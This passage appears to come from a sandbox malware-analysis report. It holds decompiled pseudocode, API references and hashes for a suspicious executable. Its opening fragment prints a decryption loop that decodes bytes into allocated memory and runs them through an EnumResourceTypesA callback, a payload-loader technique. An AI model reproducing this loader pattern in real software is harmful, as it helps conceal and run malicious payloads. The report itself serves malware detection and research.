						_v5 = (_v5 & 0x000000ff) - 0xd4;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x95;
						_v5 = _v5 & 0x000000ff ^ 0x00000078;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x98;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x74;
						_v5 = _v5 & 0x000000ff ^ 0x0000008d;
						_v5 = (_v5 & 0x000000ff) - _v12;
						 *((char*)(E729152E8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					_t112 = EnumResourceTypesA(0, E729152E8, 0); // executed
					return _t112;
				}
				return _t109;
			}









                                            0x729122e0
                                            0x729122e6
                                            0x729122fb
                                            0x72912301
                                            0x72912308
                                            0x72912317
                                            0x7291231f
                                            0x72912326
                                            0x72912338
                                            0x72912348
                                            0x7291234e
                                            0x72912361
                                            0x7291236b
                                            0x72912374
                                            0x7291237e
                                            0x72912388
                                            0x72912395
                                            0x7291239e
                                            0x729123a8
                                            0x729123b2
                                            0x729123c5
                                            0x729123ce
                                            0x729123d8
                                            0x729123eb
                                            0x729123f8
                                            0x72912402
                                            0x7291240c
                                            0x72912415
                                            0x7291241f
                                            0x72912432
                                            0x7291243c
                                            0x72912449
                                            0x72912452
                                            0x7291245e
                                            0x72912467
                                            0x72912471
                                            0x72912484
                                            0x72912491
                                            0x7291249b
                                            0x729124a8
                                            0x729124b1
                                            0x729124bb
                                            0x729124c4
                                            0x729124d1
                                            0x729124db
                                            0x729124e4
                                            0x729124f1
                                            0x729124fa
                                            0x72912504
                                            0x72912511
                                            0x7291251b
                                            0x72912524
                                            0x72912335
                                            0x72912335
                                            0x72912538
                                            0x00000000
                                            0x72912538
                                            0x72912541

                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 729122FB
                                            • EnumResourceTypesA.KERNEL32(00000000,729152E8,00000000), ref: 72912538
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocEnumResourceTypesVirtual
                                            • String ID:
                                            • API String ID: 1791965044-0
                                            • Opcode ID: 50042b976fab03d5eddcb6dff1fd51c488752a7ae938d892743339f96b45d9ac
                                            • Instruction ID: 75c84ca9d10deeae0b369c778bbb39fa3ae6e1ceaad65917882b3c65afa53d00
                                            • Opcode Fuzzy Hash: 50042b976fab03d5eddcb6dff1fd51c488752a7ae938d892743339f96b45d9ac
                                            • Instruction Fuzzy Hash: 71717514C4D2ECA9DB06C7FA44A53ECBFB14F67102F0885DAE0E576286C57A434EDB22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                            0x00405f5f
                                            0x00405f62
                                            0x00405f69
                                            0x00405f71
                                            0x00405f7d
                                            0x00000000
                                            0x00405f84
                                            0x00405f74
                                            0x00405f7b
                                            0x00000000
                                            0x00405f8c
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                              • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                              • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                              • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                            • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                            0x004058a2
                                            0x004058af
                                            0x004058c4
                                            0x004058ca

                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\DN_467842234567.exe,80000000,00000003), ref: 004058A2
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                            • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                            0x00405883
                                            0x0040588c
                                            0x00000000
                                            0x00405895
                                            0x0040589b

                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                            • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                            0x004053f8
                                            0x00405400
                                            0x00000000
                                            0x00405406
                                            0x00000000

                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                            • GetLastError.KERNEL32 ref: 00405406
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                            0x004030b4
                                            0x004030c7
                                            0x004030cf
                                            0x00000000
                                            0x004030d6
                                            0x00000000
                                            0x004030d8

                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                            • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                            0x004030f0
                                            0x004030f6

                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                            • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00404FF1, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x5f5d20
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                            0x00404ffa
                                            0x00405000
                                            0x00405009
                                            0x0040500c
                                            0x0040519d
                                            0x004051a4
                                            0x004051c8
                                            0x004051c8
                                            0x004051ce
                                            0x004051db
                                            0x004051f9
                                            0x004051f9
                                            0x00405200
                                            0x00405257
                                            0x00405257
                                            0x0040525b
                                            0x00000000
                                            0x00000000
                                            0x0040525d
                                            0x00405260
                                            0x00000000
                                            0x00000000
                                            0x0040526a
                                            0x00405270
                                            0x00405272
                                            0x00405275
                                            0x0040536e
                                            0x00000000
                                            0x0040536e
                                            0x00405284
                                            0x00405290
                                            0x00405296
                                            0x00405299
                                            0x0040529c
                                            0x004052b1
                                            0x004052b4
                                            0x004052b4
                                            0x004052b7
                                            0x0040529e
                                            0x004052a3
                                            0x004052a9
                                            0x004052ac
                                            0x004052ac
                                            0x004052c7
                                            0x004052cf
                                            0x004052d0
                                            0x004052d2
                                            0x004052db
                                            0x004052de
                                            0x004052e5
                                            0x004052ec
                                            0x004052f4
                                            0x004052f4
                                            0x00405302
                                            0x00405308
                                            0x0040530b
                                            0x0040530b
                                            0x00405312
                                            0x00405318
                                            0x00405321
                                            0x00405328
                                            0x00405331
                                            0x00405333
                                            0x00405336
                                            0x00405345
                                            0x00405347
                                            0x0040534d
                                            0x0040534e
                                            0x0040534f
                                            0x0040534f
                                            0x00405357
                                            0x00405362
                                            0x00405368
                                            0x00405368
                                            0x00000000
                                            0x004052d2
                                            0x00405202
                                            0x00405208
                                            0x00405238
                                            0x0040523a
                                            0x00405240
                                            0x0040524b
                                            0x0040524b
                                            0x00405252
                                            0x00000000
                                            0x00405252
                                            0x0040520c
                                            0x00405216
                                            0x00000000
                                            0x004051dd
                                            0x004051dd
                                            0x004051e3
                                            0x0040521b
                                            0x00000000
                                            0x00405224
                                            0x004051ec
                                            0x004051f1
                                            0x004051f4
                                            0x00000000
                                            0x004051f4
                                            0x004051db
                                            0x00405012
                                            0x00405016
                                            0x0040501f
                                            0x00405026
                                            0x00405029
                                            0x0040502c
                                            0x0040502f
                                            0x00405030
                                            0x00405031
                                            0x0040504a
                                            0x0040504d
                                            0x00405057
                                            0x00405066
                                            0x0040506e
                                            0x00405076
                                            0x0040507b
                                            0x0040507e
                                            0x0040508a
                                            0x00405093
                                            0x0040509c
                                            0x004050bf
                                            0x004050c5
                                            0x004050d6
                                            0x004050db
                                            0x004050e9
                                            0x004050f7
                                            0x004050f7
                                            0x004050fc
                                            0x0040510a
                                            0x0040510a
                                            0x0040510f
                                            0x00405112
                                            0x00405117
                                            0x00405123
                                            0x0040512c
                                            0x00405139
                                            0x00405148
                                            0x0040513b
                                            0x00405140
                                            0x00405140
                                            0x00405154
                                            0x00405154
                                            0x00405168
                                            0x00405171
                                            0x0040517a
                                            0x0040518a
                                            0x00405196
                                            0x00405196
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32 ref: 00405050
                                            • GetDlgItem.USER32 ref: 0040505F
                                            • GetClientRect.USER32 ref: 0040509C
                                            • GetSystemMetrics.USER32 ref: 004050A4
                                            • SendMessageA.USER32 ref: 004050C5
                                            • SendMessageA.USER32 ref: 004050D6
                                            • SendMessageA.USER32 ref: 004050E9
                                            • SendMessageA.USER32 ref: 004050F7
                                            • SendMessageA.USER32 ref: 0040510A
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                            • ShowWindow.USER32(?,00000008), ref: 00405140
                                            • GetDlgItem.USER32 ref: 00405161
                                            • SendMessageA.USER32 ref: 00405171
                                            • SendMessageA.USER32 ref: 0040518A
                                            • SendMessageA.USER32 ref: 00405196
                                            • GetDlgItem.USER32 ref: 0040506E
                                              • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
                                            • GetDlgItem.USER32 ref: 004051B3
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
                                            • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                            • ShowWindow.USER32(00000000), ref: 004051EC
                                            • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                            • ShowWindow.USER32(00000008), ref: 00405238
                                            • SendMessageA.USER32 ref: 0040526A
                                            • CreatePopupMenu.USER32 ref: 0040527B
                                            • AppendMenuA.USER32 ref: 00405290
                                            • GetWindowRect.USER32 ref: 004052A3
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                            • SendMessageA.USER32 ref: 00405302
                                            • OpenClipboard.USER32(00000000), ref: 00405312
                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                            • GlobalLock.KERNEL32 ref: 0040532B
                                            • SendMessageA.USER32 ref: 0040533F
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405362
                                            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405368
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: ]_${
                                            • API String ID: 590372296-1868247033
                                            • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                            • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                            • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                            • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404802, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x5f5ecc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x5f5d20
				_t315 = 0;
